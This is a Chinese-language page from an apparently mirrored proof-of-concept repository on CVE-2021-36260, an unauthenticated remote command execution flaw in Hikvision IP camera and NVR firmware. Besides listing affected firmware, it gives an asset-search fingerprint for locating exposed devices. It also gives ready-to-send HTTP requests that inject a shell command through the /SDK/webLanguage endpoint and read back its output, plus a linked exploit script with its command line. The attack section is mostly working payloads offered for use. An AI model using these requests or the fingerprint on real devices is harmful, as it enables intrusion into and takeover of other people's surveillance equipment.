crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:54:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

102 lines
4.9 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
# 一、漏洞简介
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞CVE-2021-36260。漏洞影响IP摄像头和NVR设备固件漏洞是因为对输入参数检验不充分未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备即可实现远程命令执行。
# 二、影响版本
+ <font style="color:rgba(0, 0, 0, 0.9);">易受攻击的网络摄像机固件。</font>
| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
| :---: | :---: |
| <font style="color:black;">IPC_E0</font> | <font style="color:black;">IPC_E0_CN_STD_5.4.6_180112</font> |
| <font style="color:black;">IPC_E1</font> | <font style="color:black;">未知</font> |
| <font style="color:black;">IPC_E2</font> | <font style="color:black;">IPC_E2_EN_STD_5.5.52_180620</font> |
| <font style="color:black;">IPC_E4</font> | <font style="color:black;">未知</font> |
| <font style="color:black;">IPC_E6</font> | <font style="color:black;">IPCK_E6_EN_STD_5.5.100_200226</font> |
| <font style="color:black;">IPC_E7</font> | <font style="color:black;">IPCK_E7_EN_STD_5.5.120_200604</font> |
| <font style="color:black;">IPC_G3</font> | <font style="color:black;">IPC_G3_EN_STD_5.5.160_210416</font> |
| <font style="color:black;">IPC_G5</font> | <font style="color:black;">IPC_G5_EN_STD_5.5.113_210317</font> |
| <font style="color:black;">IPC_H1</font> | <font style="color:black;">IPC_H1_EN_STD_5.4.61_181204</font> |
| <font style="color:black;">IPC_H5</font> | <font style="color:black;">IPCP_H5_EN_STD_5.5.85_201120</font> |
| <font style="color:black;">IPC_H8</font> | <font style="color:black;">Factory installed firmware mid 2021</font> |
| <font style="color:black;">IPC_R2</font> | <font style="color:black;">IPC_R2_EN_STD_V5.4.81_180203</font> |
<font style="color:rgba(0, 0, 0, 0.9);">易受攻击的 PTZ 摄像机固件。</font>
| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
| :---: | :---: |
| <font style="color:black;">IPD_E7</font> | <font style="color:black;">IPDEX_E7_EN_STD_5.6.30_210526</font> |
| <font style="color:black;">IPD_G3</font> | <font style="color:black;">IPDES_G3_EN_STD_5.5.42_210106</font> |
| <font style="color:black;">IPD_H5</font> | <font style="color:black;">IPD_H5_EN_STD_5.5.41_200911</font> |
| <font style="color:black;">IPD_H7</font> | <font style="color:black;">IPD_H7_EN_STD_5.5.40_200721</font> |
| <font style="color:black;">IPD_H8</font> | <font style="color:black;">IPD_H8_EN_STD_5.7.1_210619</font> |
<font style="color:rgba(0, 0, 0, 0.9);">易受攻击的旧固件。</font>
| **<font style="color:black;">产品类型</font>** | **<font style="color:black;">影响版本</font>** |
| :---: | :---: |
| <font style="color:black;">IPC_R7</font> | <font style="color:black;">5.4.x</font> |
| <font style="color:black;">IPD_</font><font style="color:black;">R7</font> | |
| <font style="color:black;">IPC_G0</font> | |
| <font style="color:black;">IPC_H3</font> | |
| <font style="color:black;">IPD_H3</font> | |
# 三、资产测绘
+ hunter`header="671-1e0-587ec4a1"`
+ 特征
![1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673.png](./img/BRUyZKZO0-k6Y5uv/1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673-137663.png)
# 四、漏洞复现
1. 执行命令,写入到文件中
```plain
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 79
<?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/x)</language>
```
![1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5.png](./img/BRUyZKZO0-k6Y5uv/1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5-028165.png)
2. 获取命令执行结果
```plain
GET /x HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
```
![1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437.png](./img/BRUyZKZO0-k6Y5uv/1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437-357466.png)
利用脚本
[HIKVISION_CVE-2021-36260_rce.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py)
```plain
python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al"
```
![1700232671938-598342d8-9715-45cc-8ecf-477e359015aa.png](./img/BRUyZKZO0-k6Y5uv/1700232671938-598342d8-9715-45cc-8ecf-477e359015aa-640350.png)
> 更新: 2024-02-29 23:57:17
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph37hx0zftramet9>
Reference in New Issue View Git Blame Copy Permalink